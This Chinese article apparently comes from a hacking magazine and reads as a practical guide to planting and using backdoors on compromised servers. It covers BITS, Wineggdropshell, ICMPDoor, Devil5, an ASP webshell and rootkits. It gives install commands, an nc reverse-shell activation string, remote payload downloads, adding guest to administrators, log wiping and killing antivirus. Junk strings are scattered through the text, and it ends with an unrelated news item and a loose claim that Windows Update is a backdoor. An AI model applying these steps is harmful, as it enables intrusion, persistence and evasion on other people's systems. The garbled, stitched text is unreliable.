分類
後門可以按照很多方式來分類,标準不同自然分類就不同,為了便于大家理解,我們從技術方面來考慮後門程序的分類方法:
網頁後門
此類後門程序一般都是服務器上正常的web服務來構造自己的連接方式,比如非常流行的ASP、cgi腳本後門等。
網頁後門,網絡上針對系統漏洞的攻擊事件漸漸少了,因為大家在認識到網絡安全的重要性之後,最簡單卻又最有效的防護辦法:升級,都被大家所認同,所以系統漏洞在以後的歲月中存活的周期會越來越短,而從最近的趨勢來看,腳本漏洞已經漸漸取代了系統漏洞的地位,非常多的人開始研究起腳本漏洞來,sql注入也開始成為各大安全站點首要關注熱點,找到提升權限的突破口,進而拿到服務器的系統權限。
asp、CGI、PHP這三個腳本大類在網絡上的普遍運用帶來了腳本後門在這三方面的發展。
線程插入後門
利用系統自身的某個服務或者線程,将後門程序插入到其中,具體原理原來《黑客防線》曾具體講解過,感興趣的朋友可以查閱。這也是現在最流行的一個後門技術。
擴展後門
所謂的“擴展”,是指在功能上有大的提升,比普通的單一功能的後門有很強的使用性,這種後門本身就相當于一個小的安全工具包,能實現非常多的常見安全功能,适合新手使用————但是,功能越強,個人覺得反而脫離了後門“隐蔽”的初衷,具體看法就看各位使用者的喜好了。
c/s後門
和傳統的木馬程序類似的控制方法,采用“客戶端/服務端”的控制方式,通過某種特定的訪問方式來啟動後門進而控制服務器。
rootkit6of3H3B
這個需要單獨說明,其實把它單獨列一個類在這裡是不太恰當的,但是,rootkit的出現大大改變了後門程序的思維角度和使用理念,可以說一個好的rootkit就是一個完全的系統殺手!後文我們講涉及到這方面,一定不會讓大家失望!
上面是按照技術做的分類,除了這些方面,正向連接後門、反向連接後門等分類也是很常見的,其實如何分類是編程者考慮的事,廣大的使用者就不用考慮那麼多了,我們看重的,隻是功能!
線程插入
首先我們來簡單解釋一下什麼是典型的"線程插入"後門:這種後門在運行時沒有進程,所有網絡操作均播入到其他應用程序的進程中完成。也就是說,即使受控制端安裝的防火牆擁有“應用程序訪問權限”的功能,也不能對這樣的後門進行有效的警告和攔截,也就使對方的防火牆形同虛設了!因為對它的查殺比較困難,這種後門本身的功能比較強大,是“居中家旅行、入侵攻擊”的必備品哦!
這類的典範就是國内提倡網絡共享的小榕的BITS了,從它的推出以來,各類安全工具下載園地裡BITS就高居榜首,非常多的朋友使用它的過程中感到了方便。
類型:系統後門
使用範圍:wind200/xp/2003
隐蔽程序:★★★★☆
使用難度:★★★☆☆
查殺難度:★★★★☆
BITS其實是BackgroundIntelligentTransferServicer的縮寫,可以在不知不覺中實現另一種意義的典型的線程插入後門,有以下特點:進程管理器中看不到;平時沒有端口,隻是在系統中充當卧底的角色;提供正向連接和反向連接兩種功能;僅适合用于windows200/xp/2003。
運用舉例
首先我們用3389登錄上肉雞,确定你有SYSTEM的權限,将BITS.DLL拷貝到服務器上,執行CMD命令:4#RBrA
rundll32.exebits.dll,install
這樣就激活了BIST,程序用這個特征的字符來辨認使用者,也就相當于你的密碼了,然後卸載:rundll32.exeBITS.dll,Uninstall
這是最簡單的使用,這個後門除了隐蔽性好外,還有兩大特點是非常值得借鑒的:端口複用和正反向連接。雖然很多朋友經常聽到這兩個名詞,但并不了解它們,端口複用就是利用系統正常的TCP端口通訊和控制,比如80、139等,這樣的後門有個非常大的好處就是非常隐蔽,不用自己開端口也不會暴露自己的訪問,因為通訊本身就是系統的正常訪問!另一個是反向連接,這個很常見,也是後門中一個經典思路,因為從服務器上主動方問外邊是不被禁止的,很多很曆害的防火牆就怕這點!
BITS的正向連接很簡單,大家可以參考它的README,這種方式在服務器沒有防火牆等措施的時候很管用,可以方便地連接,但是遇到有防火牆這樣的方式就不靈了,得使用下面的反向連接方式:70+g3l
在本地使用NC監聽(如:nc-l-p1234)
用NC連接目标主機的任何一個防火牆允許的TCP端口(80/139/445……)
輸入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email]^q/hQ,4
目标主機的CMD将會出現NC監聽的端口2222,這樣就實現了繞過防火牆的功能了。
擴展後門
所謂的擴展後門,在普通意義上理解,可以看成是将非常多的功能集成到了後門裡,讓後門本身就可以實現很多功能,方便直接控制肉雞或者服務器,這類的後門非常受初學者的喜愛,通常集成了文件上傳/下載、系統用戶檢測、HTTP訪問、終端安裝、端口開放、啟動/停止服務等功能,本身就是個小的工具包,功能強大。
Wineggdroupshellj;
類型:系統後門
使用範圍:win2000/xp/2003
隐蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程度:★★★★☆
查殺難度:★★★★☆
當網絡上剛推出這個後門的時候,非常多的人用它來替換自己原來使用的後門,一時間各處贊揚之聲叠起,但多為一些普通的打撈手的心聲,其實它和“後門”的原始定義是有出入的:一旦你需要實現越多的功能,那你的程序在執行、隐藏、穩定等方面就需要考慮非常多的問題,一個疏忽就會導緻全盤皆敗,所以不建議将此後門用在需要非常隐蔽的地方。
運用舉例
在安裝後門前,需要使用它自帶的EditServer.exe程序對服務端進行非常詳細的配置,從10個具體配置中,包括了插入線程、密碼、IP登錄郵件通告等方面,不難看出它的功能是非常強大的,隐蔽性也很強,下面說幾個在入侵中常用的功能,相信經常玩入侵的朋友一定能發現它的強大之處:
Fport:列出進程到端口的列表,用于發現系統中運行程序所對應的端口,可以用來檢測常見的隐蔽的後門。
Reboot:重啟系統,如果你上傳并運行了其他後門程序,并需要重啟機器以便讓後門正常工作,那使用這個命令吧!Uz
Shell:得到一個DosShell,這個不多講了,直接得到服務器或者肉雞上的cmdshell。
PskillPID或程序名:用于殺掉特定的服務,比如殺毒軟件或者是防火牆。
Execute程序:在後台中執行程序,比如sniffer等。http://ip/文件名保存文件名:下載程序,直接從網上down一個後門到服務器上。
Installterm端口:在沒有安裝終端服務的win2k服務版的系統中安裝終端服務,重啟系統後才生效,并可以自定義連接端口,比如不用3389而用其他端口。
StopService/StartService:停止或者啟動某個系統服務,比如telnet。
CleanEvent:删除系統日志。
Redirect:TCP數據轉發,這個功能是後門程序中非常出色的一個功能,可以通過某一端口的數據轉發來控制内網的機器,在滲透入侵的時候非常管用!
EnumService:列舉所有自動啟動的服務的資料,比如後門、木馬。
RegEdit:進入注冊表操作模式,熟悉注冊表的使用者終于在後門中找到了福音!!
Findpassword:得到所有登錄用戶密碼,比我們常用的findpass功能可強多了。
總體來講,Wineggdropshell是後門程序中很出彩的一個,它經過作者幾次大規模的修改和升級,已經趨于穩定,功能的強大當然沒得說,但是由于功能太強大,被查殺和懷疑是難以避免的,所以很多人在使用Wineggdropshell一段時間後就發現肉雞飛了,其實是很正常的事,我你出不用氣餒,其實用很簡單的方法就可以很好地提高它的隐蔽性,下文将有說明。
相對于Wineggdropshell來說,獨孤劍客的winshell在功能上就不那麼全面了,但是筆者推薦新手更多的使用winshell而不是Wineggdropshell,因為winshell功能除了獲得一個shell以外,隻加入了一些重啟、關閉服務器的命令,功能相對簡單,但完全使用系統自帶的cmd來執行命令,對系統學習和掌握也是非常有幫助的!
Winshell和wolf這兩者都是國内早期頂尖的後門程序,程序的編制無疑是非常經典的,新手學習時使用這兩款後門一定能讓你明白很多系統相關東西,了解很多入侵思路和方法。
C/S後門
傳統的木馬程序常常使用C/S構架,這樣的構架很方便控制,也在一定程度上避免了“萬能密碼”的情況出現,對後門私有化有一定的貢獻,這方面分類比較模糊,很多後門可以歸結到此類中,比如較巧妙的就是ICMPDoor了
類型:系統後門
使用範圍:win2000/xp/20032Z6
隐蔽程度:★★★★★
使用難度:★★★☆☆
危害程度:★★★★☆
查殺難度:★★★★★
這個後門利用ICMP通道進行通信,所以不開任何端口,隻是利用系統本身的ICMP包進行控制安裝成系統服務後,開機自動運行,可以穿透很多防火牆——很明顯可以看出它的最大特點:不開任何端口~隻通過ICMP控制!和上面任何一款後門程序相比,它的控制方式是很特殊的,連80端口都不用開放,不得不佩服務程序編制都在這方面獨特的思維角度和眼光!
運用舉例
這個後門其實用途最廣的地方在于突破網關後對内網計算機的控制,因為很多機密數據都是放在内網計算機上的,而控制内網計算機并不是我們想到位的商業網絡進行入侵檢測,它的網絡内部并不像我們常見的内網那樣非常容易入侵和控制,因為該公司本身涉及到一些網絡安全的服務,所以内網個人計算機的防護是很到位的,在嘗試過很多後門後,最後ICMPDoor幫我實現了成功的滲透内網!由此筆者開始愛上這個後門。
首先使用icmpsrv.exe-install參數進行後門的安裝,再使用icmpsend.exeIP進行控制,可以用:[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下載文件,保存在[url=file://system32]system32[/url]目錄下,文件名為hkfx.exe,程序名前的“-”不能省去,使用[pslist]還可以列出遠程主機的進程名稱和pid,再使用[pskillid]就可以殺進程了,同樣,輸入普通cmd命令,則遠程主機也就執行了相關的命令。~HF1?%
這個後門是采用的c/s構架,必須要使用icmpsend才能激活服務器,但是他也有自己的先天不足:後門依靠ICMP進行通訊,經過沖擊波的洗禮後,很少有服務器還接受ICMP包了,很多都屏蔽掉了它,所以用它來控制服務器不是一個好辦法,這也是我為什麼用它來控制内網計算機的原因了——内網很少有人屏蔽ICMP包吧?!
程序案例
海陽頂端
這是ASP腳本方面流傳非常廣的一個腳本後門了,在經過幾次大的改革後,推出了“海陽頂端ASP木馬XP版”、“海陽頂端ASP木馬紅粉佳人版”等功能強大、使用方便的後門,想必經常接觸腳本安全的朋友對這些都不會陌生。
類型:網頁木馬
使用範圍:支持ASP、WEB訪問
使用難度:★☆☆☆☆
危害程序:★★★☆☆
查殺難度:★★★☆☆
服務器系統配置都相對安全,公開的系統漏洞存在的機會很少,于是腳本方面的漏洞就開始火起來。首先我們通過某種途徑獲得一個服務器的頁面權限(比如利用論壇上傳達室類型未嚴格設置、SQL注入後獲得ASP系統的上傳權限、對已知物理路徑的服務器上傳特定程序),然後我們可以通過簡單的上傳ASP程序或者是直接複制海陽項端的代碼,然後通過WEB訪問這個程序,就能很方便地查閱服務器上的資料了,下面舉個簡單的便子(由于隻是簡單的介紹,下文便子不會太難或者太普遍,希望大家理解)。
leadbbs2.77曾經風靡網絡,它是個很典型的ASP論壇,屏蔽了很多可以SQL注入的寺方,但是很多傻瓜級别的網絡管理員總是喜歡默認安裝,然後啟用論壇,我們隻需要很簡單地在IE中輸入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能夠直接下載該論壇的數據庫了,而且沒有MD5加密哦!,我們直接找到管理員的賬戶和密碼,然後登錄論壇,到管理界面将論壇的“聯系我們”、“幫助”等ASP文件替換成我們的海陽項端代碼,然後執行GUEST權限的CMD命令,方便的上傳/下載将定程序、遠程執行程序等,這樣一個隐藏的後門就建好了!取得服務器的SYSTEM權限就看大家自己的辦法了。
一般來講,海洋的功能是非常強大的,而且不容易被查殺(一個朋友采取的方式是:先利用某個腳本漏洞上傳網頁後門,再通過海洋上傳另一個後門到隐蔽的路徑,然後通過最後上傳的後門來删除第一次上傳的海洋,這樣後門的存放路徑就可以放得非常深了,普通管理員是很難發現的),如果管理員覺得自己可能中了這裡邊樣的後門,可以利用論壇備份來恢複自己的頁面系統,再配合系統日志、論壇日志等程序檢查系統,發現可疑ASP文件打開看看海洋是很好識别的,再删除就可以了。
腳本方面的後門還有CGI和PHP兩面三刀大類,使用原理都差不多,這裡就不再多介紹,在黑防論壇也收錄了這三種後門,大家可以下載後自己研究。
devil5
類型:系統後門
使用範圍:win200/xp/2003
隐蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程序:★★★★☆
查殺難度:★★★☆☆
同BITS一樣,Devil5也是線程插入式的後門,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用習慣定制端口和需要插入的線程,适合對系統有一定了解的使用都使用,由于是自定義插入線程,所以它更難被查殺,下面我們來看看它的使用。
道德使用它自帶的配置程序EDITDEVIL5.EXE對後門進行常規的配置,包括控制端口、插入線程、連接密碼、時間間隔等方面關鍵點是對插入線程的定制,一般設置成系統自帶的SVCHOST,然後運行後門就可以控制了。
我們用TELNET連接上去,連接的格式是:TELNET***定制的端口,它和其他後門不同之處在于連接後沒有提示的界面,每次執行程序也是分開的,必須要每次都有輸入密碼,比如我們丢掉了服務器和管賬戶,可以激活GUEST後再将GUEST加到管理員權限,記得每次執行命令後加上“>密碼”就可以了:netlocalgroupadministratorsguest/add>hkfx,然後你又可以控制服務器了。
很明顯示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通過系統自帶端口通訊、執行命令比較麻煩,需要每次輸入密碼而且不回顯示輸入内容,很容易出錯。但是,它有自己的優勢:插入線程可以自已定制,比如設置IE的線程為插入的目标就比較難被查殺:自己提供了專門的查殺工具DELDEVIL5.exe,幫助防護者清理系統;而且它可以任意改名和綁定,使用靈活性上比BITS強……大家選擇哪能款就看自己的喜好了。
另外,PortLessBackDoor等工具也是此類的後門,功能強大,隐蔽性稍差,大家有興趣可以自己研究一下。
rootkit
如果說上面的後門程序都各有千秋、各有所長的話,它們和經典的rootkit一比簡直就是小巫見大巫了,那究竟什麼樣是rootkit呢?
rootkit出現于20世紀90年代初,在1994年2月的一篇安全咨詢報告中首先使用了rootkit這個名詞。從出現至今,rootkit的技術發展非常迅速,應用越來越廣泛,檢測難度也越來越大。其中钍對SunOS和Linux兩種操作系統的rootkit最多。
很多人有一個誤解,他們認為rootkit是用作獲得系統root訪問權限的工具。實際上,rootkit是攻擊都用來隐蔽自己的蹤迹和保留root訪問權限的工具。通常,攻擊者通過遠程攻擊獲得root訪問權限,進入系統後,攻擊者會在侵入的主機中安裝rootkit,然後他将經常通過rootkit的後門檢查系統是否有其他的用戶登錄,如果隻有自己,攻擊者就開始着手清理日志中的有關信息。通過rootkit的嗅探器獲得其他系統的用戶和密碼之後,攻擊者就會利用這些信息侵入其他系統。
從*nix系統上遷移到windows系統下的rootkit完全沿襲了這些“可怕”的功能!網絡上常見的rootkit是内核級後門軟件,用戶可以通過它隐藏文件、進程、系統服、系統驅動、注冊表鍵和鍵值、打開的端口以及虛構可用磁盤窨。程序同時也在内存中僞裝它所做的改動,并且隐身地控制被隐藏進程。程序安裝隐藏後門,注冊隐藏系統服務并且安裝系統驅動。該後門技術允許植入reDirector,是非常難以查殺的一個東東,讓很多網絡管員非常頭疼!
著名後門
最著名的後門程序,該算是微軟的WindowsUpdate了。WindowsUpdate的動作不外乎以下三個:開機時自動連上微軟的網站,将電腦的現況報告給網站以進行處理,網站通過WindowsUpdate程序通知使用者是否有必須更新的文件,以及如何更新。如果我們針對這些動作進行分析,則“開機時自動連上微軟網站”的動作就是後門程序特性中的“潛伏”,而“将電腦現況報告”的動作是“搜集信息”。因此,雖然微軟“信誓旦旦”地說它不會搜集個人電腦中的信息,但如果我們從WindowsUpdate來進行分析的話,就會發現它必須搜集個人電腦的信息才能進行操作,所差者隻是搜集了哪些信息而已。
越來越多的電腦族都很重視日常護眼,選擇使用護眼類軟件來減輕長時間上網對眼睛造成的負擔。然而,不法分子從中嗅到“商機”,借助該類軟件後門程序乘虛而入,給用戶造成不必要的經濟損失和麻煩。近日,騰訊智慧安全禦見威脅情報中心監測發現一款名為“護眼小秘書”的軟件攜帶後門程序,表面上看起來是一個可調整屏幕亮度、對比度的小工具,操作中也能夠“正常”卸載,但實際上“護眼小秘書”私自攜帶後門程序。
